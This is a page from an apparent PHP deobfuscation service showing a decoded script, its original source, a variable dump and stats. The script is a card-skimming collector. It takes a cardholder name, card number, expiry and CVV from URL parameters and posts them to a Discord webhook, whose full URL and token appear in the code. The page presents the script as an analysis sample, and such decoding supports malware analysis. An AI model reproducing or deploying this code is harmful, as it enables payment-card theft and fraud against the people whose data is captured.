Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$webhookUrl = 'https://discord.com/api/webhooks/1224913017611747349/ZcCz-MnpgJsYxlaRHuwypm..

Decoded Output download

<?  $webhookUrl = 'https://discord.com/api/webhooks/1224913017611747349/ZcCz-MnpgJsYxlaRHuwypmtOgzT5LbbOz0pG7NsxnSTaQ4pW53lYzTxUo01Hr2cMmiCG';  
 
$key = $_GET['key']; 
$pass = $_GET['pass']; 
$val = $_GET['val']; 
$vcc = $_GET['vcc']; 
 
$data = array( 
    'username' => '1+ INFO', 
    'content' => " 
      <<<<<<< ====================== >>>>>>> 
     NOME: $key 
     CARD: $pass 
     VAL: $val 
     CVV: $vcc 
      | DATA/HORA: $dataHora 
     <<<<<<< ====================== >>>>>>> 
      
     " 
 
); 
 
$options = array( 
    'http' => array( 
        'method' => 'POST', 
        'header' => 'Content-Type: application/json', 
        'content' => json_encode($data) 
    ) 
); 
 
$context = stream_context_create($options); 
$result = file_get_contents($webhookUrl, false, $context); ?>

Did this file decode correctly?

Original Code

$webhookUrl = 'https://discord.com/api/webhooks/1224913017611747349/ZcCz-MnpgJsYxlaRHuwypmtOgzT5LbbOz0pG7NsxnSTaQ4pW53lYzTxUo01Hr2cMmiCG'; 

$key = $_GET['key'];
$pass = $_GET['pass'];
$val = $_GET['val'];
$vcc = $_GET['vcc'];

$data = array(
    'username' => '1+ INFO',
    'content' => "
      <<<<<<< ====================== >>>>>>>
     NOME: $key
     CARD: $pass
     VAL: $val
     CVV: $vcc
      | DATA/HORA: $dataHora
     <<<<<<< ====================== >>>>>>>
     
     "

);

$options = array(
    'http' => array(
        'method' => 'POST',
        'header' => 'Content-Type: application/json',
        'content' => json_encode($data)
    )
);

$context = stream_context_create($options);
$result = file_get_contents($webhookUrl, false, $context);

Function Calls

json_encode 1

Variables

$key None
$val None
$vcc None
$data [{'key': 'username', 'value': '🔥1+ INFO🔥'}, {'key': 'content', 'value': ' \n <<<<<<< ====================== >>>>>>> \n \U0001fa99NOME: None \n \U0001fa99CARD: None \n \U0001fa99VAL: None \n \U0001fa99CVV: None \n 📆 | DATA/HORA: 0 \n <<<<<<< ====================== >>>>>>> \n \n '}]
$pass None
$webhookUrl https://discord.com/api/webhooks/1224913017611747349/ZcCz-Mn..

Stats

MD5 661679dbc61760a6e3cfcb265839dac4
Eval Count 0
Decode Time 43 ms